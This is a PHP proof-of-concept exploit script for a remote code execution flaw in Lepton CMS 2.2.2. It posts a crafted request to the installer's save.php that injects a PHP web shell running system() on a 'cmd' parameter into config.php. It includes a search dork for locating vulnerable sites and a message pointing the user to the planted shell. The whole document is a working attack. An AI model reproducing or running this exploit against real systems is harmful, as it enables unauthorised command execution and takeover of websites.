PHP:
<?php
/*
Lepton CMS v2.2.2 - Remote Code Execution.
Author: Hyp3rLinx
Exploit Author: ~
Dork: intext:"Design by CMS-LAB"
*/
$target = "http://127.0.0.1/lepton/install/save.php";
$payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";
function curl_post($url, $post_data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 15);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
$output = curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return $info;
}
$da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=$payload&database_username=root&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&[email protected]&admin_password=admin&admin_repassword=admin");
if($da['http_code'] == 200) {
echo "\nTada: Now visit /config.php?cmd= on target.\n";
}
?>